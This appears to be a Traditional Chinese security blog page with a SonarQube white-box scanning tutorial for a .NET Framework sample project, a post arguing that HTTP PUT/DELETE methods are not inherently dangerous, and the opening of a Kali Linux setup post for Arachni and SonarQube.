<p style="margin-bottom: 8px; text-indent: 2em;"><a href="https://www.sonarsource.com/products/sonarqube/downloads/?gads_campaign=SQ-Mroi-PMax&gads_ad_group=Global&gads_keyword=&_gl=1*va5gvw*_up*MQ..&gclid=CjwKCAjwmbqoBhAgEiwACIjzEI66FX1-IEadA5PhZD8AlOYcaDmlO2JNog-wx0y8seU7bEGnQSX7NBoCkNAQAvD_BwE" target="_blank">SonarQube</a>是一套白箱掃描工具,本例使用開源免費的Community版<span style="text-indent: 2em;">本,有關安裝方式可參考「<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" target="_blank">在KALI Linux建置黑、白箱掃描系統(Arachni及SonarQube)</a>」</span></p>
<p style="margin-bottom: 8px; text-indent: 2em;">本文以SonarQube提供的範例「<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank"><b><span style="color: #bf9000;">sonar-scanning-examples-master</span></b>\<b><span style="color: #990000;">sonarqube-scanner-msbuild</span></b>\<b style="background-color: #fcff01;">CSharpProject</b></a>」做示範說明,若想掃描其他.netFramework專案,請依該專案環境、結構酌作調整,尤其工具及SDK的版本。</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>一、必要需求</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(一)<a href="https://docs.sonarqube.org/latest/analysis/scan/sonarscanner-for-msbuild/" target="_blank">SonarScanner for .NET</a>(本例選用sonar-scanner-msbuild-5.11.0.60783-net46.zip)</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(二)MSBuild V14以上(VS Community 2019以上,本例選用<a href="https://visualstudio.microsoft.com/zh-hant/vs/community/" target="_blank">VS Community 2022</a>)</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(三)符合專案所需的.Net Framework(本例使用VS Community 2022自帶版本)</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>二、選用需求</b></p>
<p style="margin-bottom: 8px; margin-left: 2em; margin-top: 0px;">將SonarScanner for .NET 執行檔和 MSBuild.EXE 的所在路徑加入 <b><span style="color: red;">Path</span></b> 環境變數,若不加入環境變數,執行命令時,必須手動指定完整路徑。</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>三、各項需求安裝</b></p>
<p style="margin-bottom: 0px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"><b>(一)安裝SonarScanner for .NET:</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px;">將所下載的 sonar-scanner-msbuild-5.11.0.60783-net46.zip 解壓縮到自選目錄,例如「C:\sonar-scanner-msbuild-5.11.0.60783-net46」</p>
<p style="margin-bottom: 0px; margin-left: 4em; text-indent: -2em;"><b>(二)安裝Visual Studio Community 2022:</b></p>
<p style="margin-bottom: 8px; margin-left: 5em; margin-top: 0px; text-indent: -2em;">1.下載 <a href="https://visualstudio.microsoft.com/zh-hant/vs/community/" target="_blank">VisualStudioSetup.exe </a>(VS Community 2022的安裝檔),並執行安裝。</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2.安裝過程中,請加選「.NET Framework 4.6.2-4.7.1開發工具」和「.NET Framework 4.8.1開發工具」</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9MqaAnOLxREu3uLG3CGhCbaYAB6HYPIWWKFdUra-FC4dMIifwT2kNuSLZpIvn6i0imgfqddym7miHVkmn0aNDnRuln_wEcHw-TyS3lPZWnghgiPYv4hPX7E9Ty5gYTXBXdojXbQx4FQlkAW9Kd9NWJr3Fxls8gHuoKjIECC1Yka14kXWbLZ_q4CYd5R7o/s1245/vs-community_001.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="713" data-original-width="1245" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9MqaAnOLxREu3uLG3CGhCbaYAB6HYPIWWKFdUra-FC4dMIifwT2kNuSLZpIvn6i0imgfqddym7miHVkmn0aNDnRuln_wEcHw-TyS3lPZWnghgiPYv4hPX7E9Ty5gYTXBXdojXbQx4FQlkAW9Kd9NWJr3Fxls8gHuoKjIECC1Yka14kXWbLZ_q4CYd5R7o/w400-h229/vs-community_001.PNG" width="400" /></a></div><p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;"></p>
<p style="color: #274e13; margin-bottom: 0px;"><b>四、檢測所需環境</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(一)執行「C:\sonar-scanner-msbuild-5.11.0.60783-net46\SonarScanner.MSBuild.exe /?」會看到Sonar-scanner for .net的使用說明。</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZZLOmVNaR5tsT3d_gGoptJmNzxjhS0z1YK8gSCxMyDUYcC7iqWrwRy3R49asHLIP1XuLblim627DidYfYOV81NtO1347SeRoc0P9SMD4psfZ9Ct5hdI1QdMHReBl_VxLhH8BgGqHcrFQLxReyu580UDe5fyCA9obI23qXOYtWwGpCsamQ_aKPZK1XloE-/s1234/sonar_net_001.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="229" data-original-width="1234" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZZLOmVNaR5tsT3d_gGoptJmNzxjhS0z1YK8gSCxMyDUYcC7iqWrwRy3R49asHLIP1XuLblim627DidYfYOV81NtO1347SeRoc0P9SMD4psfZ9Ct5hdI1QdMHReBl_VxLhH8BgGqHcrFQLxReyu580UDe5fyCA9obI23qXOYtWwGpCsamQ_aKPZK1XloE-/w400-h74/sonar_net_001.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"></p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(二)執行「"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\amd64\msbuild.exe" /version」會看到Msbuild.exe的版本。</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtBybyfojo9t6NHwuusI6LlBxOBZyZJ40PXqj6Quep2lI2h6fagCj52lwI1_jMg2vwt3mkLA1UIXWtfrIdBqh5QI3r3hc3wJKXxlkc9fe9Bv6FLCJRmwf4RTKxqqyTibUzUiOHIm13yhX4mvKsuZ-YYhV_egPJsjMebg3EVZ9CTfzOpQRKMYvMakNYXjh/s1235/sonar_net_002.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="153" data-original-width="1235" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtBybyfojo9t6NHwuusI6LlBxOBZyZJ40PXqj6Quep2lI2h6fagCj52lwI1_jMg2vwt3mkLA1UIXWtfrIdBqh5QI3r3hc3wJKXxlkc9fe9Bv6FLCJRmwf4RTKxqqyTibUzUiOHIm13yhX4mvKsuZ-YYhV_egPJsjMebg3EVZ9CTfzOpQRKMYvMakNYXjh/w400-h50/sonar_net_002.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<p style="color: #274e13; margin-bottom: 0px;"><b>五、執行掃描</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(一)啟動SonarQube Scanner Server,假設位於「 <span style="color: #cc0000;">http://192.168.232.153:9000</span>」</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(二)以瀏覽器連線SonarQube Scanner Server,並建立掃描專案(如重掃描舊專案,請備妥 Project Token)</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. 由Projects頁面選擇「Create Project」->「Manually」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2.社群版只能選擇「Locally」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3.填入「Project display name」(專案名稱)及「Project key」(專案鍵名)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4.產生Project Token(專案身份代號)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5.請記下Project Token</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiudrra5PUPAamjWTSqbZYWPrRqR-AHYgkVJ8bB2YQCIR2F8FmCsP9Eqlhinp0ybu4oDhYofIgT9qv_B2wUfexUS9aWWmKW_J6zSbxDMWNaiY1RbOSsz5LMXpD3mlWj9AvlgueoGViAy2h80LwJBYIaPV7drpGjZfDFAD7WZ4CDriOQZaIjDa83t_uSydcM/s812/sonar_net_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="553" data-original-width="812" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiudrra5PUPAamjWTSqbZYWPrRqR-AHYgkVJ8bB2YQCIR2F8FmCsP9Eqlhinp0ybu4oDhYofIgT9qv_B2wUfexUS9aWWmKW_J6zSbxDMWNaiY1RbOSsz5LMXpD3mlWj9AvlgueoGViAy2h80LwJBYIaPV7drpGjZfDFAD7WZ4CDriOQZaIjDa83t_uSydcM/w400-h272/sonar_net_007.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6.選擇要被掃描的專案類型(.NET)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/s630/sonar_net_008.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="630" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/w400-h338/sonar_net_008.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">7.選擇.NET的型態(.NET Framework)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOV1DPcOt5GzcNsYc53KD7ESEHk76WzOrgJgHheUyQIExvKiy-guzN-LuYZCxO7Q1NI42zZ9VT2fWkngaU7ALNMBwOiA3haegQ0YSH8_bafTP-JMP-TuJclu0fyFKgVRM6csk9kRDbSeKkRklIHA3IzFM0WV7LP1gV-n-bHKM2t5EkosOv3qTZibjX33F3/s1544/sonar_net_009.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1050" data-original-width="1544" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOV1DPcOt5GzcNsYc53KD7ESEHk76WzOrgJgHheUyQIExvKiy-guzN-LuYZCxO7Q1NI42zZ9VT2fWkngaU7ALNMBwOiA3haegQ0YSH8_bafTP-JMP-TuJclu0fyFKgVRM6csk9kRDbSeKkRklIHA3IzFM0WV7LP1gV-n-bHKM2t5EkosOv3qTZibjX33F3/w400-h272/sonar_net_009.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(三)複製剛剛建立掃描專案時,SonarQube所提供的三段命令,利用文字編輯器酌作調整,並以「<span style="color: #990000;">Sonar_net-framework-example.bat</span>」檔名儲存在.netFramework方案目錄下(保有<b><span style="color: red;">.sln</span></b>方案檔的目錄,本例為C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject)</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLxaAoF-3lDxTq1LQyPE6kadraMtvii-sk47xb5iWCEcSUQeJsO4zSEAmGF34f6K8IH0CrKRXOcrgvBOB7he13BRTX8nizc-1rEBgwCd4j8K4waVuTmYBAIJANmqoTyPJs9X42S3XrcwAf-5lBmTHIqoHmITlWG4Gyi_FJFEcACUKuIF8A3cGYinb6YtcY/s1468/sonar_net_010.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="1468" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLxaAoF-3lDxTq1LQyPE6kadraMtvii-sk47xb5iWCEcSUQeJsO4zSEAmGF34f6K8IH0CrKRXOcrgvBOB7he13BRTX8nizc-1rEBgwCd4j8K4waVuTmYBAIJANmqoTyPJs9X42S3XrcwAf-5lBmTHIqoHmITlWG4Gyi_FJFEcACUKuIF8A3cGYinb6YtcY/w400-h129/sonar_net_010.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(四)以系統管理員身分開啟命令提示字元,將工作目錄切換到.netFramework方案目錄</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(五)直接執行「Sonar_net-framework-example.bat」(執行過程如下)</p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); font-size: 10pt; line-height: 100%; padding: 4px; word-break: break-all;"><span style="color: white;">C:\></span><span style="color: #e69138;">cd C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject></span><span style="color: #e69138;">Sonar_net-framework-example.bat</span><br /><span style="color: white;">
SonarScanner for MSBuild 5.11</span><br /><span style="color: white;">
Using the .NET Framework version of the Scanner for MSBuild</span><br /><span style="color: white;">
Pre-processing started.</span><br /><span style="color: white;">
Preparing working directories...</span><br /><span style="color: white;">
08:56:22.776 Updating build integration targets...</span><br />
<b style="color: white;"><span style="color: #ff00fe;"><<部分訊息省略>></span></b><br /><br />
<span style="color: #6fa8dc;">SonarWriteProjectData: </span><br />
<span style="color: white;">
Sonar: (SomeConsoleApplicationTest.csproj) Project processed successfully</span><br />
<b style="color: white;"><span style="color: #ff00fe;"><<部分訊息省略>></span></b><br /><br />
<span style="color: #04ff00;">建置成功。</span><span style="color: #04ff00;"> </span><br />
<span style="color: #fcff01;"><span>"C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication.sln" (Rebuild 目標) (1)</span><br />
<span> -></span><br />
<span>"C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\SomeConsoleApplicatio</span><span>n.csproj" (Rebuild 目標) (2) -></span><br />
<span>(CoreCompile 目標) -></span><br /><span> C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\Program.cs(4,18): wa</span><span>rning S1118: Add a 'protected' constructor or the 'static' keyword to the class declaration. (https://rules.sonarsource</span><span>.com/csharp/RSPEC-1118) [C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplicati</span><span>on\SomeConsoleApplication.csproj]</span><br /><span> C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\Program.cs(21,28): w</span><br />
<span>arning S3400: Remove this method and declare a constant for this value. (https://rules.sonarsource.com/csharp/RSPEC-340</span><span>0) [C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\SomeConsoleApplica</span><span>tion.csproj]</span><br />
<span> C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject\SomeConsoleApplication\Program.cs(9,17): wa</span><span>rning S2583: Change this condition so that it does not always evaluate to 'true'; some subsequent code is never execute</span><span>d. (https://rules.sonarsource.com/csharp/RSPEC-2583) [C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CShar</span><span>pProject\SomeConsoleApplication\SomeConsoleApplication.csproj]</span></span><br />
<span style="color: #fcff01;"><br /></span><br />
<span style="color: #fcff01;"> 3 個警告</span><br /><span style="color: white;">
0 個錯誤</span><br /><span style="color: white;">
經過時間 00:00:20.71</span><br /><span style="color: white;">
SonarScanner for MSBuild 5.11</span><br /><span style="color: white;">
Using the .NET Framework version of the Scanner for MSBuild</span><br /><span style="color: white;">
Post-processing started.</span><br /><span style="color: white;">
Calling the TFS Processor executable...</span><br /><span style="color: white;">
The TFS Processor has finished</span><br /><span style="color: white;">
Calling the SonarScanner CLI...</span><br /><span><b><span style="color: #ff00fe;">
<<部分訊息省略>></span></b><br /></span><br />
<span style="color: white;">
INFO: ------------------------------------------------------------------------</span><br />
<span style="color: white;">
INFO: <span style="background-color: #6c3483;">EXECUTION SUCCESS</span></span><br />
<span style="color: white;">
INFO: ------------------------------------------------------------------------</span><br /><span style="color: white;">
INFO: Total time: 45.588s</span><br /><span style="color: white;">
INFO: Final Memory: 16M/57M</span><br /><span style="color: white;">
INFO: ------------------------------------------------------------------------</span><br /><span style="background-color: #6c3483; color: white;">
The SonarScanner CLI has finished</span><br /><span style="color: white;">
08:57:43.051 Post-processing succeeded.</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild\CSharpProject></span><br /><br />
</div>
<hr style="border: 2px solid rgb(174, 214, 241);" />
<p style="margin-bottom: 8px; text-indent: 2em;">如果前面各步驟無誤,應該可以完成掃描,最後會看到「<span style="color: #990000;">EXECUTION SUCCESS</span>」。如果過程出現錯誤,請仔細研讀訊息,善用Google或ChatGPT找出解答。</p><p style="margin-bottom: 8px; text-indent: 2em;">完成掃描後,可在SonarQube Scanner Web UI看到專案結果~~</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQGjigVWEQeTuo4IusXnxhg7G7oi3yZBAlDR80BYZgSjWSd__iMSZbOdAJ9IHtXPP-iLPTnd8M5knjQIxifBepdKbKtpG2abLiNekfmUZL5FOQA-ucBsOQUH6A1rRm8_HhcFdxaxShFbJreZkC_oIqpt728G80ZoJ2n1uC_yWyoRnm4bdSABHWKR4pMYL/s1567/sonar_net_011.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="410" data-original-width="1567" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQGjigVWEQeTuo4IusXnxhg7G7oi3yZBAlDR80BYZgSjWSd__iMSZbOdAJ9IHtXPP-iLPTnd8M5knjQIxifBepdKbKtpG2abLiNekfmUZL5FOQA-ucBsOQUH6A1rRm8_HhcFdxaxShFbJreZkC_oIqpt728G80ZoJ2n1uC_yWyoRnm4bdSABHWKR4pMYL/w640-h168/sonar_net_011.PNG" width="640" /></a></div><br /><span style="background-color: #9fc5e8;"> 關於 dotNet Core 專案的掃描,請參閱:<a href="http://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">以SonarQube掃描dotNet Core專案源碼(白箱掃描)</a></span></div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-4498938798612813242023-06-25T08:51:00.005+08:002023-06-25T08:51:52.102+08:00Web Server開啟PUT / DELETE方法,真的危險嗎?<div style="border: 3px solid rgb(8, 108, 197); line-height: 150%; padding: 8px;">
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">前言</span></b></p>
<p style="text-indent: 2em;">RFC7231是http方法的實作建議文件,在第4節提到:</p>
<p style="border: 1pt solid green; padding: 3pt;">HTTP was originally designed to be usable as an interface to distributed object systems. The request method was envisioned as applying semantics to a target resource in much the same way as invoking a defined method on an identified object would apply semantics. </p>
<p>(HTTP的原始設計目標是作為分散式物件系統的操作介面,將請求方法當成操作指定物件的方式)。</p>
<p>而RFC7231中共提供八種http方法:</p>
<table style="border: 1pt solid black;">
<tbody>
<tr>
<th style="border: 1pt solid black;">方法</th>
<th style="border: 1pt solid black;">說明</th>
</tr>
<tr>
<td style="border: 1pt solid black;">GET</td>
<td style="border: 1pt solid black;">傳送指定的資源(含回應標頭及狀態碼)</td>
</tr>
<tr>
<td style="border: 1pt solid black;">HEAD</td>
<td style="border: 1pt solid black;">類似GET,但傳送回應標頭及狀態碼</td>
</tr>
<tr>
<td style="border: 1pt solid black;">POST</td>
<td style="border: 1pt solid black;">按請求載荷,處理指定的資源</td>
</tr>
<tr>
<td style="border: 1pt solid black;">PUT</td>
<td style="border: 1pt solid black;">以請求載荷取代目標資源的內容(若目標資源不存在,則新增之)</td>
</tr>
<tr>
<td style="border: 1pt solid black;">DELETE</td>
<td style="border: 1pt solid black;">移除目標資源的當前內容</td>
</tr>
<tr>
<td style="border: 1pt solid black;">CONNECT</td>
<td style="border: 1pt solid black;">就處理的資源,在client和server之間建立連線通道</td>
</tr>
<tr>
<td style="border: 1pt solid black;">OPTIONS</td>
<td style="border: 1pt solid black;">指出目標資源可用的通訊選項</td>
</tr>
<tr>
<td style="border: 1pt solid black;">TRACE</td>
<td style="border: 1pt solid black;">沿著到達目標資源的路徑,執行訊息環回測試。</td>
</tr>
</tbody>
</table>
<p>對於不會改變資源狀態的方法,被視為「安全」,如GET、HEAD、OPTIONS和TRACE</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">緣由</span></b></p>
<p style="text-indent: 2em;">收過幾次滲透測試報告,指出:<span style="color: #cc0000;">網站開啟OPTIONS、PUT、DELETE等方法(method),會讓駭客上傳後門、木馬,或者刪除重要檔案,屬高風險漏洞,必須關閉。</span>事實真是如此嗎?心中一直存疑。滲透測試人員是否做過驗證程序嗎?還是看到網路上的報導,就人云亦云?會有這樣的見解,或許是因為早期Internet的目標資源是「檔案」形式。但現今,目標資源已衍生出多種形態,原本的不安全論點是否還適用?</p>
<p>從RFC7231的說明:</p>
<p style="border: 1pt solid green; padding: 3pt;">Unlike distributed objects, the standardized request methods in HTTP are not resource-specific, since uniform interfaces provide for better visibility and reuse in network-based systems [REST]. Once defined, a standardized method ought to have the same semantics when applied to any resource, <b><span style="color: #cc0000;">though each resource determines for itself whether those semantics are implemented or allowed.</span></b></p>
<p>(與分散式物件不同,標準的HTTP請求並未限定特定資源,在網路體系(REST)裡,介面的一致性可更好理解和重複使用,儘管<span style="color: #cc0000;"><b>各個資源可以自行決定是否實作這些方法的功能或同意執行這些方法</b></span>,但有了標準化方法,操作任何資源時,就不致於誤解意思。)</p><p>上面這段話並「沒有規定PUT/DELETE只用來操作檔案」。</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">行動</span></b></p>
<p style="text-indent: 2em;">為此,在Git Hub上找到<a href="https://github.com/apache/tomcat" target="_blank">Tomcat源碼</a>,從Tomcat預設<a href="http://DefaultServlet.java" target="_blank">DefaultServlet.java</a>發現處理PUT和DELETE方法的邏輯,確實可以上傳及刪除指定的檔案。既然PUT和DELETE的功能可由Tomcat的預設Servlet來定義,表示開發者亦可重新定義這些方法,進而改變PUT和DELETE的處理邏輯,那麼,PUT和DELETE是不是真的不安全?就必要經過實際驗證,因此錄製一段影片,藉由修改PUT和DELETE的程式邏輯,證明PUT和DELETE不像一般滲透測試人員所言那麼地危險!</p>
<p>影片在:<a data-saferedirecturl="https://www.google.com/url?q=https://youtu.be/x85wiKm3JSg&source=gmail&ust=1687691715169000&usg=AOvVaw0v09qIpHS7YAJMwi6JZYqK" href="https://youtu.be/x85wiKm3JSg" style="background-color: white; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: small;" target="_blank">https://youtu.be/x85wiKm3JSg</a></p>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-86817049232687923982023-03-05T19:48:00.009+08:002023-09-28T11:07:26.977+08:00在KALI Linux建置黑、白箱掃描系統(Arachni及SonarQube)<div style="border: 3px solid rgb(8, 108, 197); line-height: 150%; padding: 8px;">
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">前言</span></b></p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">最近因資安教學,需要介紹免費的Web黑、白箱掃描工具,看網路上許多大大推薦arachni(黑箱)及SonarQube(白箱),由於筆者從事滲透測試時,經常使用Kali Linux,加上Kali有完整的第三方環境,便興起於Kali安裝這兩套工具的念頭。</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">網路上有很多關於arachni和SonarQube的安裝及使用說明,筆者照著做,卻踩了不少坑、撞了許多牆,便藉部落格留下紀錄,以供日後回顧。</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">壹、Kali環境說明</span></b></p>
